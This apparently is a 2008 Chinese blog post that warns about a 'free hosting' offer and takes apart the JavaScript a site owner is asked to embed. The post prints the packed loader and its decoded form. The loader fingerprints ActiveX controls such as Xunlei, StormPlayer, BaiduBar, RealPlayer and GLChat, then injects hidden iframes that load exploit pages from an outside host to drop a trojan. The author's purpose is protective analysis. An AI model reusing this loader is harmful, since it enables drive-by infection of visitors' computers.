前几日看到有人提供免费VPS和空间,感觉蛮好奇。猜测对方意图未果,便加上QQ询问,结果几句话下来吓我一跳。此人免费提供空间或vps,只要求挂一段JS代码,无任何广告 不影响网站 说目的是为了刷流量和排名!话说到此就感觉对方在胡扯,于是下载对方要求的JS一看,里面只连接了一个JS URL,在下在看又是一个,每次都要转成HTML看,好几个下来把老汉累个半死!最后终于出来一堆东西,最终目标自动下载木马!
利用一大堆漏洞,具体代码不贴了,瑞星免杀的,中了麻烦!
DPClient.Vod迅雷漏洞;MPS.StormPlayer.1暴风影音漏洞;
PowerPlayerCtrl.1DVD播放器漏洞;Pdg2 超星阅览器漏洞;
GLCHAT.GLChatCtrl.1联众大厅漏洞;
BaiduBar.Tool.1百度超级搜霸漏洞,......
首先检查你是否安装WEB迅雷,无安装的会弹出安装提示,安装的会利用xunlei漏洞自动下载并执行木马!
要求挂的代码是:
< sc ri pt src=" scr ip t>
看起来像统计,是吧.
然后我下回来分析下:
documen t.writ eln("<ifr ame src=\"http:\/\/xxxxxx\/page\/add_ 65543967.htm?0055\" width=0 height=0>< \/ifram e>")
看到了吧,是打开了的一个静态页面
我们来继续分析:
http:\/\/xxxxxx\/page\/add_ 65543967.htm
其实是
\page\add_ 65543967.htm(这是地址)?0055(类似于统计)
来分析下上面的页面代码:
< scr ipt src=addr.js(嫌疑地址)></script>
<script language="javascript" type="text/javascript" src="(统计地址)"></s crip t>
跳过统计,我们来看那个嫌疑地址addr.js:
eva l (funct ion(p,a,c,k,e,d){e=function©{return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e©]=k[c]||e©;k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e©+'\\b','g'),k[c]);return p}('z n=h 1f();n.1e(n.1d()+1c*A*A*1b);z y=h 1a(3.v);4(y.x("u=")==-1){j{4(19.18.17().x("w"+"16 7")==-1)3.f(\'<2 c=l:b a="9://8.5/w.k"></2>\')}i(e){}3.v="u=15;13="+n.12();j{4(h m("11.10"))3.f(\'<2 c=l:b a="9://8.5/Z.k"></2>\')}i(e){}j{4(h m("Y.X"+"W"+"V.1"))3.f(\'<2 c=l:b a="9://8.5/U.k"></2>\')}i(e){}j{4(h m("T.S.1"))3.f(\'<2 c=l:b a="9://8.5/R.k"></2>\')}i(e){}Q="P##########################!@#@!#O";j{q=h m("t"+"s"+".t"+"s.1");4(q.N("M")<="6.0.14.L"){K="J*(&F)(D*&F()*D&F)";3.f(\'<2 c=d\'+\'p\'+\'o:b a="9://8.5/r\'+\'I.g\'+\'4"></2>\')}H{3.f(\'<2 c=d\'+\'p\'+\'o:b a="9://8.5/r\'+\'G.g\'+\'4"></2>\')}}i(e){}j{4(h m("E.C.1"))3.f(\'<2 c=l:b a="9://8.5/B.k"></2>\')}i(e){}}',62,78,'||iframe|document|if|cn|||51xiazai886|http|src|none|style|||write||new|catch|try|gif|display|ActiveXObject|Then|lay|isp|Link||PCtl|IER|Cookie1|cookie|ms|indexOf|bbbbcookie|var|60|lz|GLChatCtrl||GLCHAT||eal_new|else|eal|yyyyyyyyyyy|xxxxxxxxxxxxxfiudsif|552|PRODUCTVERSION|PlayerProperty|lasf|flsadjfljasfd|fakshdflkasdhfasdf|bd|Tool|BaiduBar|bf|layer|ormP|St|MPS|xl|Vod|DPClient|toGMTString|expires||POPWIN DOS|ie|toLowerCase|userAgent|navigator|String|1000|24|getTime|setTime|Date'.split('|'),0, {}))
哦,加密了呢~那就解:
var The n=ne w Da te();Then.setTime(Then.getTime()+24*60*60*1000);var bbbbcookie=new String(document.cookie);if(bbbbcookie.indexOf("Cookie1=")==-1){try{if(navigator.userAgent.toLowerCase().indexOf("ms"+"ie 7")==-1)document.write('<iframe style=display:none src=";')}catch(e){}document.cookie="Cookie1=POPWINDOS;expires="+Then.toGMTString();try{if(new ActiveXObject("DPClient.Vod"))document.write('<iframe style=display:none src=";')}catch(e){}try{if(new ActiveXObject("MPS.St"+"ormP"+"layer.1"))document.write('<iframe style=display:none src=";')}catch(e){}try{if(new ActiveXObject("BaiduBar.Tool.1"))document.write('<iframe style=display:none src=";')}catch(e){}fakshdflkasdhfasdf="flsadjfljasfd##########################!@#@!#lasf";try{Link=new ActiveXObject("IER"+"PCtl"+".IER"+"PCtl.1");if(Link.PlayerProperty("PRODUCTVERSION")<="6.0.14.552"){xxxxxxxxxxxxxfiudsif="yyyyyyyyyyy*(&F)(D*&F()*D&F)";document.write('<iframe style=d'+'isp'+'lay:none src="'+'eal_new.g'+'if"></iframe>')}}catch(e){}try{if(new ActiveXObject("GLCHAT.GLChatCtrl.1"))document.write('<iframe style=display:none src=";')}catch(e) { }}
好多网马~还都是GIF格式的.在这里讲下小知识,GIF格式是可以执行HTML命令的,大家可以试下.
随便解密下XL.GIF(一看就像是讯雷的,不过不要通过看,要进行真实分析)
因代码过长,所以我只写出解密的木马地址吧:
;
这里的知识点: 怎么进行网马的分辨:
clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F 这个的就是讯雷的
最后我们来分析这个木马
杀毒网报出的信息:
扫描结果 : 22%的杀软(8/36)报告发现病毒时间 : 2008/05/19 18:06:08 (CST)
AntiVir7.8.0.197.0.4.592008-05-19TR/Agent.4096.209
15.241Arcavir1.0.42008051901482008-05-19Heur.Win32.I
6.526BitDefender7.60825.12008237.190672008-05-19Trojan.Agent.AINZ
Dr.WEB4.44.0.91702008.05.192008-05-19Trojan.MulDrop.15725
F-PROT4.4.1.52200805182008-05-18Possible W32/Downloader-Sml-based!Maximus
SOPHOS2.73.04.292008-05-19Mal/Heuri-E
VBA323.12.6.620080518.15382008-05-18Win32.Trojan.Downloader (http://...) (suspicious)
趋势8.500-10015.284.032008-05-18TROJ_ZLOB.AKT
此人QQ 316070087 网站他资料有 对代码有兴趣者可以复制他的网址代替< sc ri pt src=" scr ip t> 中的xxxxxx研究!
最后几句,无商不奸 天下无免费的午餐 埋头苦干胜于光说不练 www.sadny.cn
A5创业网 版权所有
